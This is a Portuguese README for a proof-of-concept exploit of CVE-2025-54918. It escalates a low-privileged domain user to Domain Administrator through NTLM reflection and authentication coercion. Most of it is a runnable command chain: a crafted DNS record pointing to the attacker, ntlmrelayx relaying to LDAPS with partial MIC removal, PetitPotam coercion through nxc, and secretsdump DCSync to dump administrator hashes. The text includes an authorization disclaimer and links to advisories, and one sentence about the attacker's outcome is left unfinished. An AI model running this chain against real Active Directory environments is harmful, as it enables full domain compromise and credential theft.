
POC para CVE-2025-54918 e uma demonstração técnica.
IMPORTANTE:
Para testar a CVE-2025-54918, você deve criar um registro DNS no ambiente do Active Directory de destino.
Sempre consulte o cliente e obtenha autorização explícita antes de testar, pois isso pode impactar o comportamento de DNS e autenticação em ambientes de produção.
Este repositório contém uma Prova de Conceito técnica demonstrando como um usuário de domínio com baixos privilégios pode escalar para acesso de nível Administrador de Domínio abusando de reflexão NTLM combinada com coerção de autenticação.
Nota: a CVE é explorável mesmo com signing definido como True, que é o padrão para um controlador de domínio. Além disso, a correção da CVE-2025–54918 foi para o Windows 2025 , e a CVE-2025–33073 corrigiu (não intencionalmente) para o Windows 2022.
Uma análise mais técnica está disponível na minha página do Medium: https://yousofnahya.medium.com/hands-on-exploitation-of-cve-2025-54918-cf376ebb40e1
192.168.140.150 (Signing é True, que é o padrão para um controlador de domínio)192.168.140.135nahya.localtest Usuário de domínio válido (sem privilégios de DCSync)Clone os repositórios necessários:
git clone https://github.com/dirkjanm/krbrelayx.git
git clone https://github.com/decoder-it/impacket-partial-mic.git
Verifique se o usuário não consegue executar DCSync antes da exploração:
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC

Crie um registro DNS usando o nome NetBIOS + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA que resolva para o IP do atacante.
python3 dnstool.py -u 'nahya.local\USERNAME' -p 'PASSWORD' \
dc.nahya.local -a add \
-r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' \
-d '192.168.140.135' -dns-ip 192.168.140.150

Execute o ntlmrelayx com remoção parcial do MIC e escalonamento LDAP habilitado:
python3 impacket-partial-mic/examples/ntlmrelayx.py --remove-mic-partial -smb2support -t ldaps://DC --escalate-user USERNAME --no-validate-privs

Force o Controlador de Domínio a autenticar no registro DNS controlado pelo atacante usando uma técnica de coerção (PetitPotam):
nxc smb DC -u 'USERNAME' -p 'PASSWORD' -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA

Execute novamente o secretsdump para confirmar o escalonamento de privilégios:
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC
✅ Resultado esperado: DCSync bem-sucedido e obtenção dos hashes de Administrador de Domínio

Neste ponto, o atacante:
Consulte o artigo no Medium para uma explicação aprofundada da vulnerabilidade e da cadeia de ataque.
Este trabalho não teria sido possível sem:
impacket-partial-micAnalisando a vulnerabilidade de bypass de autenticação NTLM & LDAP – Blog da CrowdStrike
https://www.crowdstrike.com/en-us/blog/analyzing-ntlm-ldap-authentication-bypass-vulnerability/
Advisory de Segurança da Microsoft – CVE-2025-54918 – Guia de Atualização do MSRC
https://msrc.microsoft.com/update-guide/advisory/CVE-2025-54918
Esta Prova de Conceito é fornecida apenas para fins educacionais e de testes de segurança autorizados.